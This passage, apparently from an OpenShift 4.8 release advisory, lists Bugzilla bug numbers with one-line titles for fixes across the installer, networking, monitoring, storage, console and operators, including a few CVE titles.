1953846 - SystemMemoryExceedsReservation alert should consider hugepage reservation 1953977 - [4.8] packageserver pods restart many times on the SNO cluster 1953979 - Ironic caching virtualmedia images results in disk space limitations 1954003 - Alerts shouldn't report any alerts in firing or pending state: openstack-cinder-csi-driver-controller-metrics TargetDown 1954025 - Disk errors while scaling up a node with multipathing enabled 1954087 - Unit tests for kube-scheduler-operator 1954095 - Apply user defined tags in AWS Internal Registry 1954105 - TaskRuns Tab in PipelineRun Details Page makes cluster based calls for TaskRuns 1954124 - oc set volume not adding storageclass to pvc which leads to issues using snapshots 1954150 - CVE-2021-23382 nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js 1954177 - machine-api: admissionReviewVersions v1beta1 is going to be removed in 1.22 1954187 - multus: admissionReviewVersions v1beta1 is going to be removed in 1.22 1954248 - Disable Alertmanager Protractor e2e tests 1954317 - [assisted operator] Environment variables set in the subscription not being inherited by the assisted-service container 1954330 - NetworkPolicy: allow-from-router with label policy-group.network.openshift.io/ingress: "" does not work on a upgraded cluster 1954421 - Get 'Application is not available' when access Prometheus UI 1954459 - Error: Gateway Time-out display on Alerting console 1954460 - UI, The status of "Used Capacity Breakdown [Pods]" is "Not available" 1954509 - FC volume is marked as unmounted after failed reconstruction 1954540 - Lack translation for local language on pages under storage menu 1954544 - authn operator: endpoints controller should use the context it creates 1954554 - Add e2e tests for auto node sizing 1954566 - Cannot update a component (UtilizationCard) error when switching perspectives manually 1954597 - Default image for GCP does not support ignition V3 1954615 - Undiagnosed panic detected in pod: pods/openshift-cloud-credential-operator_cloud-credential-operator 1954634 - apirequestcounts does not honor max users 1954638 - apirequestcounts should indicate removedinrelease of empty instead of 2.0 1954640 - Support of gatherers with different periods 1954671 - disable volume expansion support in vsphere csi driver storage class 1954687 - localvolumediscovery and localvolumset e2es are disabled 1954688 - LSO has missing examples for localvolumesets 1954696 - [API-1009] apirequestcounts should indicate useragent 1954715 - Imagestream imports become very slow when doing many in parallel 1954755 - Multus configuration should allow for net-attach-defs referenced in the openshift-multus namespace 1954765 - CCO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1954768 - baremetal-operator: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1954770 - Backport upstream fix for Kubelet getting stuck in DiskPressure 1954773 - OVN: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component does not trigger APIRemovedInNextReleaseInUse alert 1954783 - [aws] support byo private hosted zone 1954790 - KCM Alert PodDisruptionBudget At and Limit do not alert with maxUnavailable or MinAvailable by percentage 1954830 - verify-client-go job is failing for release-4.7 branch 1954865 - Add necessary priority class to pod-identity-webhook deployment 1954866 - Add necessary priority class to downloads 1954870 - Add necessary priority class to network components 1954873 - dns server may not be specified for clusters with more than 2 dns servers specified by openstack. 1954891 - Add necessary priority class to pruner 1954892 - Add necessary priority class to ingress-canary 1954931 - (release-4.8) Remove legacy URL anonymization in the ClusterOperator related resources 1954937 - [API-1009] oc get apirequestcount shows blank for column REQUESTSINCURRENTHOUR 1954959 - unwanted decorator shown for revisions in topology though should only be shown only for knative services 1954972 - TechPreviewNoUpgrade featureset can be undone 1954973 - "read /proc/pressure/cpu: operation not supported" in node-exporter logs 1954994 - should update to 2.26.0 for prometheus resources label 1955051 - metrics "kube_node_status_capacity_cpu_cores" does not exist 1955089 - Support [sig-cli] oc observe works as expected test for IPv6 1955100 - Samples: APIRemovedInNextReleaseInUse info alerts display 1955102 - Add vsphere_node_hw_version_total metric to the collected metrics 1955114 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM 1955196 - linuxptp-daemon crash on 4.8 1955226 - operator updates apirequestcount CRD over and over 1955229 - release-openshift-origin-installer-e2e-aws-calico-4.7 is permfailing 1955256 - stop collecting API that no longer exists 1955324 - Kubernetes Autoscaler should use Go 1.16 for testing scripts 1955336 - Failure to Install OpenShift on GCP due to Cluster Name being similar to / contains "google" 1955414 - 4.8 -> 4.7 rollbacks broken on unrecognized flowschema openshift-etcd-operator 1955445 - Drop crio image metrics with high cardinality 1955457 - Drop container_memory_failures_total metric because of high cardinality 1955467 - Disable collection of node_mountstats_nfs metrics in node_exporter 1955474 - [aws-ebs-csi-driver] rebase from version v1.0.0 1955478 - Drop high-cardinality metrics from kube-state-metrics which aren't used 1955517 - Failed to upgrade from 4.6.25 to 4.7.8 due to the machine-config degradation 1955548 - [IPI][OSP] OCP 4.6/4.7 IPI with kuryr exceeds defined serviceNetwork range 1955554 - MAO does not react to events triggered from Validating Webhook Configurations 1955589 - thanos-querier should have a PodDisruptionBudget in HA topology 1955595 - Add DevPreviewLongLifecycle Descheduler profile 1955596 - Pods stuck in creation phase on realtime kernel SNO 1955610 - release-openshift-origin-installer-old-rhcos-e2e-aws-4.7 is permfailing 1955622 - 4.8-e2e-metal-assisted jobs: Timeout of 360 seconds expired waiting for Cluster to be in status ['installing', 'error'] 1955701 - [4.8] RHCOS boot image bump for RHEL 8.4 Beta 1955749 - OCP branded templates need to be translated 1955761 - packageserver clusteroperator does not set reason or message for Available condition 1955783 - NetworkPolicy: ACL audit log message for allow-from-router policy should also include the namespace to distinguish between two policies similarly named configured in respective namespaces 1955803 - OperatorHub - console accepts any value for "Infrastructure features" annotation 1955822 - CIS Benchmark 5.4.1 Fails on ROKS 4: Prefer using secrets as files over secrets as environment variables 1955854 - Ingress clusteroperator reports Degraded=True/Available=False if any ingresscontroller is degraded or unavailable 1955862 - Local Storage Operator using LocalVolume CR fails to create PV's when backend storage failure is simulated 1955874 - Webscale: sriov vfs are not created and sriovnetworknodestate indicates sync succeeded - state is not correct 1955879 - Customer tags cannot be seen in S3 level when set spec.managementState from Managed-> Removed-> Managed in configs.imageregistry with high ratio 1955969 - Workers cannot be deployed attached to multiple networks. 1956079 - Installer gather doesn't collect any networking information 1956208 - Installer should validate root volume type 1956220 - Set htt proxy system properties as expected by kubernetes-client 1956281 - Disconnected installs are failing with kubelet trying to pause image from the internet 1956334 - Event Listener Details page does not show Triggers section 1956353 - test: analyze job consistently fails 1956372 - openshift-gcp-routes causes disruption during upgrade by stopping before all pods terminate 1956405 - Bump k8s dependencies in cluster resource override admission operator 1956411 - Apply custom tags to AWS EBS volumes 1956480 - [4.8] Bootimage bump tracker 1956606 - probes FlowSchema manifest not included in any cluster profile 1956607 - Multiple manifests lack cluster profile annotations 1956609 - [cluster-machine-approver] CSRs for replacement control plane nodes not approved after restore from backup 1956610 - manage-helm-repos manifest lacks cluster profile annotations 1956611 - OLM CRD schema validation failing against CRs where the value of a string field is a blank string 1956650 - The container disk URL is empty for Windows guest tools 1956768 - aws-ebs-csi-driver-controller-metrics TargetDown 1956826 - buildArgs does not work when the value is taken from a secret 1956895 - Fix chatty kubelet log message 1956898 - fix log files being overwritten on container state loss 1956920 - can't open terminal for pods that have more than one container running 1956959 - ipv6 disconnected sno crd deployment hive reports success status and clusterdeployrmet reporting false 1956978 - Installer gather doesn't include pod names in filename 1957039 - Physical VIP for pod -> Svc -> Host is incorrectly set to an IP of 169.254.169.2 for Local GW 1957041 - Update CI e2echart with more node info 1957127 - Delegated authentication: reduce the number of watch requests 1957131 - Conformance tests for OpenStack require the Cinder client that is not included in the "tests" image 1957146 - Only run test/extended/router/idle tests on OpenshiftSDN or OVNKubernetes 1957149 - CI: "Managed cluster should start all core operators" fails with: OpenStackCinderDriverStaticResourcesControllerDegraded: "volumesnapshotclass.yaml" (string): missing dynamicClient 1957179 - Incorrect VERSION in node_exporter 1957190 - CI jobs failing due too many watch requests (prometheus-operator) 1957198 - Misspelled console-operator condition 1957227 - Issue replacing the EnvVariables using the unsupported ConfigMap 1957260 - [4.8] [gcp] Installer is missing new region/zone europe-central2 1957261 - update godoc for new build status image change trigger fields 1957295 - Apply priority classes conventions as test to openshift/origin repo 1957315 - kuryr-controller doesn't indicate being out of quota 1957349 - [Azure] Machine object showing Failed phase even node is ready and VM is running properly 1957374 - mcddrainerr doesn't list specific pod 1957386 - Config serve and validate command should be under alpha 1957446 - prepare CCO for future without v1beta1 CustomResourceDefinitions 1957502 - Infrequent panic in kube-apiserver in aws-serial job 1957561 - lack of pseudolocalization for some text on Cluster Setting page 1957584 - Routes are not getting created when using hostname without FQDN standard 1957597 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone 1957645 - Event "Updated PrometheusRule.monitoring.coreos.com/v1 because it changed" is frequently looped with weird empty {} changes 1957708 - e2e-metal-ipi and related jobs fail to bootstrap due to multiple VIP's 1957726 - Pod stuck in ContainerCreating - Failed to start transient scope unit: Connection timed out 1957748 - Ptp operator pod should have CPU and memory requests set but not limits 1957756 - Device Replacemet UI, The status of the disk is "replacement ready" before I clicked on "start replacement" 1957772 - ptp daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent 1957775 - CVO creating cloud-controller-manager too early causing upgrade failures 1957809 - [OSP] Install with invalid platform.openstack.machinesSubnet results in runtime error 1957822 - Update apiserver tlsSecurityProfile description to include Custom profile 1957832 - CMO end-to-end tests work only on AWS 1957856 - 'resource name may not be empty' is shown in CI testing 1957869 - baremetal IPI power_interface for irmc is inconsistent 1957879 - cloud-controller-manage ClusterOperator manifest does not declare relatedObjects 1957889 - Incomprehensible documentation of the GatherClusterOperatorPodsAndEvents gatherer 1957893 - ClusterDeployment / Agent conditions show "ClusterAlreadyInstalling" during each spoke install 1957895 - Cypress helper projectDropdown.shouldContain is not an assertion 1957908 - Many e2e failed requests caused by kube-storage-version-migrator-operator's version reads 1957926 - "Add Capacity" should allow to add n3 (or n4) local devices at once 1957951 - [aws] destroy can get blocked on instances stuck in shutting-down state 1957967 - Possible test flake in listPage Cypress view 1957972 - Leftover templates from mdns 1957976 - Ironic execute_deploy_steps command to ramdisk times out, resulting in a failed deployment in 4.7 1957982 - Deployment Actions clickable for view-only projects 1957991 - ClusterOperatorDegraded can fire during installation 1958015 - "config-reloader-cpu" and "config-reloader-memory" flags have been deprecated for prometheus-operator 1958080 - Missing i18n for login, error and selectprovider pages 1958094 - Audit log files are corrupted sometimes 1958097 - don't show "old, insecure token format" if the token does not actually exist 1958114 - Ignore staged vendor files in pre-commit script 1958126 - [OVN]Egressip doesn't take effect 1958158 - OAuth proxy container for AlertManager and Thanos are flooding the logs 1958216 - ocp libvirt: dnsmasq options in install config should allow duplicate option names 1958245 - cluster-etcd-operator: static pod revision is not visible from etcd logs 1958285 - Deployment considered unhealthy despite being available and at latest generation 1958296 - OLM must explicitly alert on deprecated APIs in use 1958329 - pick 97428: add more context to log after a request times out 1958367 - Build metrics do not aggregate totals by build strategy 1958391 - Update MCO KubeletConfig to mixin the API Server TLS Security Profile Singleton 1958405 - etcd: current health checks and reporting are not adequate to ensure availability 1958406 - Twistlock flags mode of /var/run/crio/crio.sock 1958420 - openshift-install 4.7.10 fails with segmentation error 1958424 - aws: support more auth options in manual mode 1958439 - Install/Upgrade button on Install/Upgrade Helm Chart page does not work with Form View 1958492 - CCO: pod-identity-webhook still accesses APIRemovedInNextReleaseInUse 1958643 - All pods creation stuck due to SR-IOV webhook timeout 1958679 - Compression on pool can't be disabled via UI 1958753 - VMI nic tab is not loadable 1958759 - Pulling Insights report is missing retry logic 1958811 - VM creation fails on API version mismatch 1958812 - Cluster upgrade halts as machine-config-daemon fails to parse rpm-ostree status during cluster upgrades 1958861 - [CCO] pod-identity-webhook certificate request failed 1958868 - ssh copy is missing when vm is running 1958884 - Confusing error message when volume AZ not found 1958913 - "Replacing an unhealthy etcd member whose node is not ready" procedure results in new etcd pod in CrashLoopBackOff 1958930 - network config in machine configs prevents addition of new nodes with static networking via kargs 1958958 - [SCALE] segfault with ovnkube adding to address set 1958972 - [SCALE] deadlock in ovn-kube when scaling up to 300 nodes 1959041 - LSO Cluster UI,"Troubleshoot" link does not exist after scale down osd pod 1959058 - ovn-kubernetes has lock contention on the LSP cache 1959158 - packageserver clusteroperator Available condition set to false on any Deployment spec change 1959177 - Descheduler dev manifests are missing permissions 1959190 - Set LABEL io.openshift.release.operator=true for driver-toolkit image addition to payload 1959194 - Ingress controller should use minReadySeconds because otherwise it is disrupted during deployment updates 1959278 - Should remove prometheus servicemonitor from openshift-user-workload-monitoring 1959294 - openshift-operator-lifecycle-manager:olm-operator-serviceaccount should not rely on external networking for health check 1959327 - Degraded nodes on upgrade - Cleaning bootversions: Read-only file system 1959406 - Difficult to debug performance on ovn-k without pprof enabled 1959471 - Kube sysctl conformance tests are disabled, meaning we can't submit conformance results 1959479 - machines doesn't support dual-stack loadbalancers on Azure 1959513 - Cluster-kube-apiserver does not use library-go for audit pkg 1959519 - Operand details page only renders one status donut no matter how many 'podStatuses' descriptors are used 1959550 - Overly generic CSS rules for dd and dt elements breaks styling elsewhere in console 1959564 - Test verify /run filesystem contents failing 1959648 - oc adm top --help indicates that oc adm top can display storage usage while it cannot 1959650 - Gather SDI-related MachineConfigs 1959658 - showing a lot "constructing many client instances from the same exec auth config" 1959696 - Deprecate 'ConsoleConfigRoute' struct in console-operator config 1959699 - [RFE] Collect LSO pod log and daemonset log managed by LSO 1959703 - Bootstrap gather gets into an infinite loop on bootstrap-in-place mode 1959711 - Egressnetworkpolicy doesn't work when configure the EgressIP 1959786 - [dualstack]EgressIP doesn't work on dualstack cluster for IPv6 1959916 - Console not works well against a proxy in front of openshift clusters 1959920 - UEFISecureBoot set not on the right master node 1959981 - [OCPonRHV] - Affinity Group should not create by default if we define empty affinityGroupsNames: [] 1960035 - iptables is missing from ose-keepalived-ipfailover image 1960059 - Remove "Grafana UI" link from Console Monitoring > Dashboards page 1960089 - ImageStreams list page, detail page and breadcrumb are not following CamelCase conventions 1960129 - [e2e][automation] add smoke tests about VM pages and actions 1960134 - some origin images are not public 1960171 - Enable SNO checks for image-registry 1960176 - CCO should recreate a user for the component when it was removed from the cloud providers 1960205 - The kubelet log flooded with reconcileState message once CPU manager enabled 1960255 - fixed obfuscation permissions 1960257 - breaking changes in pr template 1960284 - ExternalTrafficPolicy Local does not preserve connections correctly on shutdown, policy Cluster has significant performance cost 1960323 - Address issues raised by coverity security scan 1960324 - manifests: extra "spec.version" in console quickstarts makes CVO hotloop 1960330 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960334 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960337 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960339 - manifests: unset "preemptionPolicy" makes CVO hotloop 1960531 - Items under 'Current Bandwidth' for Dashboard 'Kubernetes / Networking / Pod' keep added for every access 1960534 - Some graphs of console dashboards have no legend and tooltips are difficult to undstand compared with grafana 1960546 - Add virt_platform metric to the collected metrics 1960554 - Remove rbacv1beta1 handling code 1960612 - Node disk info in overview/details does not account for second drive where /var is located 1960619 - Image registry integration tests use old-style OAuth tokens 1960683 - GlobalConfigPage is constantly requesting resources 1960711 - Enabling IPsec runtime causing incorrect MTU on Pod interfaces 1960716 - Missing details for debugging 1960732 - Outdated manifests directory in CSI driver operator repositories 1960757 - [OVN] hostnetwork pod can access MCS port 22623 or 22624 on master 1960758 - oc debug / oc adm must-gather do not require openshift/tools and openshift/must-gather to be "the newest" 1960767 - /metrics endpoint of the Grafana UI is accessible without authentication 1960780 - CI: failed to create PDB "service-test" the server could not find the requested resource 1961064 - Documentation link to network policies is outdated 1961067 - Improve log gathering logic 1961081 - policy/v1beta1 PodDisruptionBudget is deprecated in v1.21+, unavailable in v1.25+; use policy/v1 PodDisruptionBudget in CMO logs 1961091 - Gather MachineHealthCheck definitions 1961120 - CSI driver operators fail when upgrading a cluster 1961173 - recreate existing static pod manifests instead of updating 1961201 - [sig-network-edge] DNS should answer A and AAAA queries for a dual-stack service is constantly failing 1961314 - Race condition in operator-registry pull retry unit tests 1961320 - CatalogSource does not emit any metrics to indicate if it's ready or not 1961336 - Devfile sample for BuildConfig is not defined 1961356 - Update single quotes to double quotes in string 1961363 - Minor string update for " No Storage classes found in cluster, adding source is disabled." 1961393 - DetailsPage does not work with group~version~kind 1961452 - Remove "Alertmanager UI" link from Console Monitoring > Alerting page 1961466 - Some dropdown placeholder text on route creation page is not translated 1961472 - openshift-marketplace pods in CrashLoopBackOff state after RHACS installed with an SCC with readOnlyFileSystem set to true 1961506 - NodePorts do not work on RHEL 7.9 workers (was "4.7 -> 4.8 upgrade is stuck at Ingress operator Degraded with rhel 7.9 workers") 1961536 - clusterdeployment without pull secret is crashing assisted service pod 1961538 - manifests: invalid namespace in ClusterRoleBinding makes CVO hotloop 1961545 - Fixing Documentation Generation 1961550 - HAproxy pod logs showing error "another server named 'pod:httpd-7c7ccfffdc-wdkvk:httpd:8080-tcp:10.128.x.x:8080' was already defined at line 326, please use distinct names" 1961554 - respect the shutdown-delay-duration from OpenShiftAPIServerConfig 1961561 - The encryption controllers send lots of request to an API server 1961582 - Build failure on s390x 1961644 - NodeAuthenticator tests are failing in IPv6 1961656 - driver-toolkit missing some release metadata 1961675 - Kebab menu of taskrun contains Edit options which should not be present 1961701 - Enhance gathering of events 1961717 - Update runtime dependencies to Wallaby builds for bugfixes 1961829 - Quick starts prereqs not shown when description is long 1961852 - Excessive lock contention when adding many pods selected by the same NetworkPolicy 1961878 - Add Sprint 199 translations 1961897 - Remove history listener before console UI is unmounted 1961925 - New ManagementCPUsOverride admission plugin blocks pod creation in clusters with no nodes 1962062 - Monitoring dashboards should support default values of "All" 1962074 - SNO:the pod get stuck in CreateContainerError and prompt "failed to add conmon to systemd sandbox cgroup: dial unix /run/systemd/private: connect: resource temporarily unavailable" after adding a performanceprofile 1962095 - Replace gather-job image without FQDN 1962153 - VolumeSnapshot routes are ambiguous, too generic 1962172 - Single node CI e2e tests kubelet metrics endpoints intermittent downtime 1962219 - NTO relies on unreliable leader-for-life implementation. 1962256 - use RHEL8 as the vm-example 1962261 - Monitoring components requesting more memory than they use 1962274 - OCP on RHV installer fails to generate an install-config with only 2 hosts in RHV cluster 1962347 - Cluster does not exist logs after successful installation 1962392 - After upgrade from 4.5.16 to 4.6.17, customer's application is seeing re-transmits 1962415 - duplicate zone information for in-tree PV after enabling migration 1962429 - Cannot create windows vm because kubemacpool.io denied the request 1962525 - [Migration] SDN migration stuck on MCO on RHV cluster 1962569 - NetworkPolicy details page should also show Egress rules 1962592 - Worker nodes restarting during OS installation 1962602 - Cloud credential operator scrolls info "unable to provide upcoming..." on unsupported platform 1962630 - NTO: Ship the current upstream TuneD 1962687 - openshift-kube-storage-version-migrator pod failed due to Error: container has runAsNonRoot and image will run as root 1962698 - Console-operator can not create resource console-public configmap in the openshift-config-managed namespace 1962718 - CVE-2021-29622 prometheus: open redirect under the /new endpoint 1962740 - Add documentation to Egress Router 1962850 - [4.8] Bootimage bump tracker 1962882 - Version pod does not set priorityClassName 1962905 - Ramdisk ISO source defaulting to "http" breaks deployment on a good amount of BMCs 1963068 - ironic container should not specify the entrypoint 1963079 - KCM/KS: ability to enforce localhost communication with the API server. 1963154 - Current BMAC reconcile flow skips Ironic's deprovision step 1963159 - Add Sprint 200 translations 1963204 - Update to 8.4 IPA images 1963205 - Installer is using old redirector 1963208 - Translation typos/inconsistencies for Sprint 200 files 1963209 - Some strings in public.json have errors 1963211 - Fix grammar issue in kubevirt-plugin.json string 1963213 - Memsource download script running into API error 1963219 - ImageStreamTags not internationalized 1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment 1963267 - Warning: Invalid DOM property classname. Did you mean className? console warnings in volumes table 1963502 - create template from is not descriptive 1963676 - in vm wizard when selecting an os template it looks like selecting the flavor too 1963833 - Cluster monitoring operator crashlooping on single node clusters due to segfault 1963848 - Use OS-shipped stalld vs. the NTO-shipped one. 1963866 - NTO: use the latest k8s 1.21.1 and openshift vendor dependencies 1963871 - cluster-etcd-operator:[build] upgrade to go 1.16 1963896 - The VM disks table does not show easy links to PVCs 1963912 - "[sig-network] DNS should provide DNS for {services, cluster, subdomain, hostname}" failures on vsphere 1963932 - Installation failures in bootstrap in OpenStack release jobs 1963964 - Characters are not escaped on config ini file causing Kuryr bootstrap to fail 1964059 - rebase openshift/sdn to kube 1.21.1 1964197 - Failing Test vendor/k8s.io/kube-aggregator/pkg/apiserver TestProxyCertReload due to hardcoded certificate expiration 1964203 - e2e-metal-ipi, e2e-metal-ipi-ovn-dualstack and e2e-metal-ipi-ovn-ipv6 are failing due to "Unknown provider baremetal" 1964243 - The oc compliance fetch-raw doesn’t work for disconnected cluster 1964270 - Failed to install 'cluster-kube-descheduler-operator' with error: "clusterkubedescheduleroperator.4.8.0-202105211057.p0.assembly.stream\": must be no more than 63 characters" 1964319 - Network policy "deny all" interpreted as "allow all" in description page 1964334 - alertmanager/prometheus/thanos-querier /metrics endpoints are not secured 1964472 - Make project and namespace requirements more visible rather than giving me an error after submission 1964486 - Bulk adding of CIDR IPS to whitelist is not working 1964492 - Pick 102171: Implement support for watch initialization in P&F 1964625 - NETID duplicate check is only required in NetworkPolicy Mode 1964748 - Sync upstream 1.7.2 downstream 1964756 - PVC status is always in 'Bound' status when it is actually cloning 1964847 - Sanity check test suite missing from the repo 1964888 - opoenshift-apiserver imagestreamimports depend on >34s timeout support, WAS: transport: loopyWriter.run returning. connection error: desc = "transport is closing" 1964936 - error log for "oc adm catalog mirror" is not correct 1964979 - Add mapping from ACI to infraenv to handle creation order issues 1964997 - Helm Library charts are showing and can be installed from Catalog 1965024 - [DR] backup and restore should perform consistency checks on etcd snapshots 1965092 - [Assisted-4.7] [Staging][OLM] Operators deployments start before all workers finished installation 1965283 - 4.7->4.8 upgrades: cluster operators are not ready: openshift-controller-manager (Upgradeable=Unknown NoData: ), service-ca (Upgradeable=Unknown NoData: 1965330 - oc image extract fails due to security capabilities on files 1965334 - opm index add fails during image extraction 1965367 - Typo in in etcd-metric-serving-ca resource name 1965370 - "Route" is not translated in Korean or Chinese 1965391 - When storage class is already present wizard do not jumps to "Stoarge and nodes" 1965422 - runc is missing Provides oci-runtime in rpm spec 1965522 - [v2v] Multiple typos on VM Import screen 1965545 - Pod stuck in ContainerCreating: Unit ...slice already exists 1965909 - Replace "Enable Taint Nodes" by "Mark nodes as dedicated" 1965921 - [oVirt] High performance VMs shouldn't be created with Existing policy 1965929 - kube-apiserver should use cert auth when reaching out to the oauth-apiserver with a TokenReview request 1966077 - hidden descriptor is visible in the Operator instance details page1966116 - DNS SRV request which worked in 4.7.9 stopped working in 4.7.11 1966126 - root_ca_cert_publisher_sync_duration_seconds metric can have an excessive cardinality 1966138 - (release-4.8) Update K8s & OpenShift API versions 1966156 - Issue with Internal Registry CA on the service pod 1966174 - No storage class is installed, OCS and CNV installations fail 1966268 - Workaround for Network Manager not supporting nmconnections priority 1966401 - Revamp Ceph Table in Install Wizard flow 1966410 - kube-controller-manager should not trigger APIRemovedInNextReleaseInUse alert 1966416 - (release-4.8) Do not exceed the data size limit 1966459 - 'policy/v1beta1 PodDisruptionBudget' and 'batch/v1beta1 CronJob' appear in image-registry-operator log 1966487 - IP address in Pods list table are showing node IP other than pod IP 1966520 - Add button from ocs add capacity should not be enabled if there are no PV's 1966523 - (release-4.8) Gather MachineAutoScaler definitions 1966546 - [master] KubeAPI - keep day1 after cluster is successfully installed 1966561 - Workload partitioning annotation workaround needed for CSV annotation propagation bug 1966602 - don't require manually setting IPv6DualStack feature gate in 4.8 1966620 - The bundle.Dockerfile in the repo is obsolete 1966632 - [4.8.0] [assisted operator] Unable to re-register an SNO instance if deleting CRDs during install 1966654 - Alertmanager PDB is not created, but Prometheus UWM is 1966672 - Add Sprint 201 translations 1966675 - Admin console string updates 1966677 - Change comma to semicolon 1966683 - Translation bugs from Sprint 201 files 1966684 - Verify "Creating snapshot for claim <1>{pvcName}</1>" displays correctly 1966697 - Garbage collector logs every interval - move to debug level 1966717 - include full timestamps in the logs 1966759 - Enable downstream plugin for Operator SDK 1966795 - [tests] Release 4.7 broken due to the usage of wrong OCS version 1966813 - "Replacing an unhealthy etcd member whose node is not ready" procedure results in new etcd pod in CrashLoopBackOff 1966862 - vsphere IPI - local dns prepender is not prepending nameserver 127.0.0.1 1966892 - [master] [Assisted-4.8][SNO] SNO node cannot transition into "Writing image to disk" from "Waiting for bootkub[e" 1966952 - [4.8.0] [Assisted-4.8][SNO][Dual Stack] DHCPv6 settings "ipv6.dhcp-duid=ll" missing from dual stack install 1967104 - [4.8.0] InfraEnv ctrl: log the amount of NMstate Configs baked into the image 1967126 - [4.8.0] [DOC] KubeAPI docs should clarify that the InfraEnv Spec pullSecretRef is currently ignored 1967197 - 404 errors loading some i18n namespaces 1967207 - Getting started card: console customization resources link shows other resources 1967208 - Getting started card should use semver library for parsing the version instead of string manipulation 1967234 - Console is continuously polling for ConsoleLink acm-link 1967275 - Awkward wrapping in getting started dashboard card 1967276 - Help menu tooltip overlays dropdown 1967398 - authentication operator still uses previous deleted pod ip rather than the new created pod ip to do health check 1967403 - (release-4.8) Increase workloads fingerprint gatherer pods limit 1967423 - [master] clusterDeployments controller should take 1m to reqeueue when failing with AddOpenshiftVersion 1967444 - openshift-local-storage pods found with invalid priority class, should be openshift-user-critical or begin with system- while running e2e tests 1967531 - the ccoctl tool should extend MaxItems when listRoles, the default value 100 is a little small 1967578 - [4.8.0] clusterDeployments controller should take 1m to reqeueue when failing with AddOpenshiftVersion 1967591 - The ManagementCPUsOverride admission plugin should not mutate containers with the limit 1967595 - Fixes the remaining lint issues 1967614 - prometheus-k8s pods can't be scheduled due to volume node affinity conflict 1967623 - [OCPonRHV] - ./openshift-install installation with install-config doesn't work if ovirt-config.yaml doesn't exist and user should fill the FQDN URL 1967625 - Add OpenShift Dockerfile for cloud-provider-aws 1967631 - [4.8.0] Cluster install failed due to timeout while "Waiting for control plane" 1967633 - [4.8.0] [Assisted-4.8][SNO] SNO node cannot transition into "Writing image to disk" from "Waiting for bootkube" 1967639 - Console whitescreens if user preferences fail to load 1967662 - machine-api-operator should not use deprecated "platform" field in infrastructures.config.openshift.io 1967667 - Add Sprint 202 Round 1 translations 1967713 - Insights widget shows invalid link to the OCM 1967717 - Insights Advisor widget is missing a description paragraph and contains deprecated naming 1967745 - When setting DNS node placement by toleration to not tolerate master node, effect value should not allow string other than "NoExecute" 1967803 - should update to 7.5.5 for grafana resources version label 1967832 - Add more tests for periodic.go 1967833 - Add tasks pool to tasks_processing 1967842 - Production logs are spammed on "OCS requirements validation status Insufficient hosts to deploy OCS. A minimum of 3 hosts is required to deploy OCS" 1967843 - Fix null reference to messagesToSearch in gather_logs.go 1967902 - [4.8.0] Assisted installer chrony manifests missing index numberring 1967933 - Network-Tools debug scripts not working as expected 1967945 - [4.8.0] [assisted operator] Assisted Service Postgres crashes msg: "mkdir: cannot create directory '/var/lib/pgsql/data/userdata': Permission denied" 1968019 - drain timeout and pool degrading period is too short 1968067 - [master] Agent validation not including reason for being insufficient 1968168 - [4.8.0] KubeAPI - keep day1 after cluster is successfully installed 1968175 - [4.8.0] Agent validation not including reason for being insufficient 1968373 - [4.8.0] BMAC re-attaches installed node on ISO regeneration 1968385 - [4.8.0] Infra env require pullSecretRef although it shouldn't be required 1968435 - [4.8.0] Unclear message in case of missing clusterImageSet 1968436 - Listeners timeout updated to remain using default value 1968449 - [4.8.0] Wrong Install-config override documentation 1968451 - [4.8.0] Garbage collector not cleaning up directories of removed clusters 1968452 - [4.8.0] [doc] "Mirror Registry Configuration" doc section needs clarification of functionality and limitations 1968454 - [4.8.0] backend events generated with wrong namespace for agent 1968455 - [4.8.0] Assisted Service operator's controllers are starting before the base service is ready 1968515 - oc should set user-agent when talking with registry 1968531 - Sync upstream 1.8.0 downstream 1968558 - [sig-cli] oc adm storage-admin [Suite:openshift/conformance/parallel] doesn't clean up properly 1968567 - [OVN] Egress router pod not running and openshift.io/scc is restricted 1968625 - Pods using sr-iov interfaces failign to start for Failed to create pod sandbox 1968700 - catalog-operator crashes when status.initContainerStatuses[].state.waiting is nil 1968701 - Bare metal IPI installation is failed due to worker inspection failure 1968754 - CI: e2e-metal-ipi-upgrade failing on KubeletHasDiskPressure, which triggers machine-config RequiredPoolsFailed 1969212 - [FJ OCP4.8 Bug - PUBLIC VERSION]: Masters repeat reboot every few minutes during workers provisioning 1969284 - Console Query Browser: Can't reset zoom to fixed time range after dragging to zoom 1969315 - [4.8.0] BMAC doesn't check if ISO Url changed before queuing BMH for reconcile 1969352 - [4.8.0] Creating BareMetalHost without the "inspect.metal3.io" does not automatically add it 1969363 - [4.8.0] Infra env should show the time that ISO was generated. 1969367 - [4.8.0] BMAC should wait for an ISO to exist for 1 minute before using it 1969386 - Filesystem's Utilization doesn't show in VM overview tab 1969397 - OVN bug causing subports to stay DOWN fails installations 1969470 - [4.8.0] Misleading error in case of install-config override bad input 1969487 - [FJ OCP4.8 Bug]: Avoid always do delete_configuration clean step 1969525 - Replace golint with revive 1969535 - Topology edit icon does not link correctly when branch name contains slash 1969538 - Install a VolumeSnapshotClass by default on CSI Drivers that support it 1969551 - [4.8.0] Assisted service times out on GetNextSteps due tooc adm release infotaking too long 1969561 - Test "an end user can use OLM can subscribe to the operator" generates deprecation alert 1969578 - installer: accesses v1beta1 RBAC APIs and causes APIRemovedInNextReleaseInUse to fire 1969599 - images without registry are being prefixed with registry.hub.docker.com instead of docker.io 1969601 - manifest for networks.config.openshift.io CRD uses deprecated apiextensions.k8s.io/v1beta1 1969626 - Portfoward stream cleanup can cause kubelet to panic 1969631 - EncryptionPruneControllerDegraded: etcdserver: request timed out 1969681 - MCO: maxUnavailable of ds/machine-config-daemon does not get updated due to missing resourcemerge check 1969712 - [4.8.0] Assisted service reports a malformed iso when we fail to download the base iso 1969752 - [4.8.0] [assisted 